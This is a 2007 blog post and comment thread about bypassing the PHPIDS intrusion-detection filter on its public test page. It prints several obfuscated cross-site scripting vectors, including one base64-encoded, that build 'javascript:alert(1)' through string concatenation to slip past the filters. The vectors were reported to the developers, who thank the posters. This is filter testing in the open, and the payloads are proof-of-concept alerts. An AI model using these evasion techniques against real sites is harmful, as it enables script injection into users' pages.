So you think you’re a hacker?
Tuesday, 4 September 2007
I’ve been testing the PHPIDS after Sirdarckcat tempted me with his post π At first I created 2 simple vectors to make injection more difficult, then I spent a couple of hours coming up with a full tag and Javascript injection. I shall post the vector here once they have fixed it because it is quite dangerous and I don’t want their site open to attack. So if you think you are a good hacker, try and inject some javascript on their Smoke test, it isn’t as easy as it first looks.
No. 1 — September 4th, 2007 at 12:30 pm
I’ve found another serious one. I’ll share when it’s fixed. Here’s the other one I did which has now been fixed:-
s1=0?”:’i’;s2=0?”:’fr’;s3=0?”:’ame’;i1=s1+s2+s3;s1=0?”:’jav’;s2=
0?”:’ascr’;s3=0?”:’ipt’;s4=0?”:’:’;s5=0?”:’ale’;s6=0?”:’rt’;s7=
0?”:'(1)’;i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=pa
rentNode;x.appendChild(i);
No. 2 — September 4th, 2007 at 2:57 pm
Hi!
Great work again – thx a lot! It led me to refactor the converter unit of the PHPIDS and I think I have found a pretty stable beta of the regex to check and de-assemble concatenations.
I am very looking forward for the 0.4.0 release we are currently working on – the help of you guys is what helps improving it eminently.
Greetz,
.mario
No. 3 — September 4th, 2007 at 2:58 pm
This is also fixed now:-
s1=”+’java’+”+’scr’+”;s2=”+’ipt’+’:’+’ale’+”;s3=”+’rt’+”+'(1)’+”;
u1=s1+s2+s3;URL=u1
No. 4 — September 4th, 2007 at 3:01 pm
Good work Mario/PHPIDS team, I really admire all your efforts on this because I know how difficult it is to protect against this stuff.
I’ll look forward to hacking it again though π
No. 5 — September 4th, 2007 at 3:46 pm
always appreciated!
No. 6 — September 4th, 2007 at 11:28 pm
It almost looks like ASCII art, good job! π
No. 7 — September 5th, 2007 at 12:28 am
Hehe thanks π
I might try again soon cause I love a interesting challenge
No. 8 — September 5th, 2007 at 4:50 am
Found another one (IE only):-
I’ve had to base64 encode it because it causes conversation errors:-
czE9IScnJiYnamF2JztzMj0hJycmJidhc2NyaXB0JztzMz0hJycmJic6JztzND0hJycmJidhbGVy
JztzNT0hJycmJid0JztzNj0hJycmJicoMSknO3M3PXMxK3MyK3MzK3M0K3M1K3M2O1VSTD1zNzs=
No. 9 — September 6th, 2007 at 9:04 am
and another:-
s1=”+”jav”+”;s2=”+”ascri”+”;s3=”+”pt”+”;s4=”==”?’:’:0;s5=”+”aler”+”;s6=”+”t”+”;s7=”==”?'(1)’:0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8
No. 10 — September 7th, 2007 at 3:08 pm
No. 11 — September 8th, 2007 at 10:25 am
Check this one out, creates javascript: and passes it to the URL property, only works in IE though.
No. 12 — September 8th, 2007 at 6:43 pm
Here’s my favorite:-
No. 13 — September 8th, 2007 at 10:45 pm
Yeah I think this will be an endless armsrace π
btw do you know the Javascript functions:
import() and export() ? It’s pretty cool cause you can export singed script data if import is called inside a signed script. I didn’t know this, there is a lot more to be learned in Javascript.
No. 14 — September 9th, 2007 at 9:03 am
Nope didn’t know that but sounds cool, I’m gonna google it.
No. 15 — September 9th, 2007 at 6:31 pm
No. 16 — September 9th, 2007 at 6:42 pm
Definitely an arms race, I just can’t see how they can prevent all of it because we can always come up with new ways of doing things.
Still I’m impressed with their filters it isn’t that easy to come up with new vectors and I’ve done loads of complicated ones which don’t get through.
No. 17 — September 9th, 2007 at 9:05 pm
I meant:
import function() or var
export function() or var
Like:
function a() {
//foo
}
export a;
misleading stuff I know π
No. 18 — September 9th, 2007 at 9:42 pm
Found any docs on that? I would be interested to read, I tried Mozilla but there’s not much stuff on it.
No. 19 — September 10th, 2007 at 1:50 am
It is here:
http://devedge-temp.mozilla.org/library/manuals/2000/javascript/1.3/guide/sec.html
Be amazed what the ‘ol netscape can learn us, it’s almost forbidden knowledge. I read the whole book over the weekend, learned tons of new and old stuff.
π
No. 20 — September 11th, 2007 at 10:09 am
This one’s awesome π
_=alert,1,1,_(1);
No. 21 — September 18th, 2007 at 1:34 am
This one took ages cause it’s really tough now with their new filters:-
s=function test2() {return ‘hrefjavascriptalert(1)a’;1,1}();
void(a = {} );
void(c = URL );
a.c=function xyz() {return c[4] }();
a.h1=function xyz() {return s[0] }();
a.h2=function xyz() {return s[1] }();
a.h3=function xyz() {return s[2] }();
a.h4=function xyz() {return s[3] }();
a.u1=function xyz() {return s[4] }();
a.u2=function xyz() {return s[5] }();
a.u3=function xyz() {return s[6] }();
a.u4=function xyz() {return s[7] }();
a.u5=function xyz() {return s[8] }();
a.u6=function xyz() {return s[9] }();
a.u7=function xyz() {return s[10] }();
a.u8=function xyz() {return s[11] }();
a.u9=function xyz() {return s[12] }();
a.u10=function xyz() {return s[13] }();
a.u11=function xyz() {return s[14] }();
a.u12=function xyz() {return s[15] }();
a.u13=function xyz() {return s[16] }();
a.u14=function xyz() {return s[17] }();
a.u15=function xyz() {return s[18] }();
a.u16=function xyz() {return s[19] }();
a.u17=function xyz() {return s[20] }();
a.u18=function xyz() {return s[21] }();
$_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4 + a.u5 + a.u6 + a.u7 + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 + a.u15 + a.u16 + a.u17 + a.u18 }();
for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_;